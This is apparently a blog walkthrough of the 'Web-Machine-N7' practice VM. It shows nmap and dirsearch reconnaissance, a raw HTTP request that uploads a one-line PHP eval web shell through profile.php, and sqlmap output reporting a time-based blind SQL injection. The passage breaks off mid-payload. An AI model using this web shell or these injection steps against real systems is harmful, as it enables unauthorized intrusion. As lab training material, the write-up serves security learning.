Web-Machine-N7

原创

已于 2022-03-20 22:17:22 修改 · 2k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#web安全

于 2022-03-20 22:16:38 首次发布

$ sudo nmap -sP 192.168.0.1/24

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:31 CST
Nmap scan report for 192.168.0.1
Host is up (0.00048s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.101
Host is up (0.18s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.102
Host is up (0.19s latency).
MAC Address: D2:66:41:4A:73:EF (Unknown)
Nmap scan report for 192.168.0.103
Host is up (0.19s latency).
MAC Address: 7A:7D:03:A2:2C:73 (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.19s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.106
Host is up (0.18s latency).
MAC Address: 2A:86:BB:96:BD:6C (Unknown)
Nmap scan report for 192.168.0.107
Host is up (0.00013s latency).
MAC Address: 08:00:27:ED:BD:C7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.109
Host is up (0.00066s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 2.93 seconds

$ sudo nmap -sV -sC -A 192.168.0.107

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:32 CST
Nmap scan report for 192.168.0.107
Host is up (0.00024s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.46 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.46 (Debian)
MAC Address: 08:00:27:ED:BD:C7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.24 ms 192.168.0.107

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds

$ ./dirsearch.py -u 192.168.0.107


  _|. _ _  _  _  _ _|_    v0.4.2.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11305

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.107_22-03-21_04-45-34.txt

Target: http://192.168.0.107/

[04:45:34] Starting: 
[04:45:35] 403 -  278B  - /.ht_wsr.txt
[04:45:35] 403 -  278B  - /.htaccess.bak1
[04:45:35] 403 -  278B  - /.htaccess.save
[04:45:35] 403 -  278B  - /.htaccess.sample
[04:45:35] 403 -  278B  - /.htaccess.orig
[04:45:35] 403 -  278B  - /.htaccessBAK
[04:45:35] 403 -  278B  - /.htaccessOLD
[04:45:35] 403 -  278B  - /.htaccessOLD2
[04:45:35] 403 -  278B  - /.htaccess_extra
[04:45:35] 403 -  278B  - /.htaccess_orig
[04:45:35] 403 -  278B  - /.htaccess_sc
[04:45:35] 403 -  278B  - /.htm
[04:45:35] 403 -  278B  - /.html
[04:45:35] 403 -  278B  - /.htpasswd_test
[04:45:35] 403 -  278B  - /.htpasswds
[04:45:35] 403 -  278B  - /.httr-oauth
[04:45:36] 403 -  278B  - /.php
[04:45:47] 200 -    2KB - /index.html
[04:45:48] 301 -  319B  - /javascript  ->  http://192.168.0.107/javascript/
[04:45:53] 200 -    1KB - /profile.php
[04:45:54] 403 -  278B  - /server-status
[04:45:54] 403 -  278B  - /server-status/

Task Completed

$ python3 dirsearch.py -e php,txt,zip,html -u 192.168.0.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -f .html --exclude-status 403,401


  _|. _ _  _  _  _ _|_    v0.4.2.3
 (_||| _) (/_(_|| (_| )

Extensions: php, txt, zip, html | HTTP method: GET | Threads: 40 | Wordlist size: 1323275

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.107_22-03-20_21-10-10.txt

Target: http://192.168.0.107/

[21:10:10] Starting: 
[21:10:10] 200 -    2KB - //
[21:10:10] 200 -    1KB - /profile.php
[21:10:11] 200 -    2KB - /index.html
[21:10:18] 301 -  319B  - /javascript  ->  http://192.168.0.107/javascript/
[21:11:03] 200 -  279B  - /exploit.html

POST /profile.php HTTP/1.1
Host: 192.168.0.107
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------390266645724629296494056176300
Content-Length: 258
Origin: http://192.168.0.107
Connection: close
Referer: http://192.168.0.107/exploit.html
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------390266645724629296494056176300
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/x-php

<?php @eval($_POST['hacker']); ?>

-----------------------------390266645724629296494056176300--

$ sqlmap -u "http://192.168.0.107/enter_network/" --forms  --dbs --current-db

        ___
       __H__
 ___ ___[(]_____ ___ ___  {
   
   1.6.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:57:49 /2022-03-20/

[21:57:49] [INFO] testing connection to the target URL
[21:57:49] [INFO] searching for forms
[1/1] Form:
POST http://192.168.0.107/enter_network/
POST data: user=&pass=&sub=SEND
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: user=&pass=&sub=SEND] (Warning: blank fields detected): 
do you want to fill blank fields with random values? [Y/n] Y
[21:57:55] [INFO] resuming back-end DBMS 'mysql' 
[21:57:55] [INFO] using '/home/joker/.local/share/sqlmap/output/results-03202022_0957pm.csv' as the CSV results file in multiple targets mode
you have not declared cookie(s), while server wants to set its own ('role=MjEyMzJmMjk...FmYzM%253D;user=JGFyZ29uMmk...8rdGVZNWxv'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pass (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=jL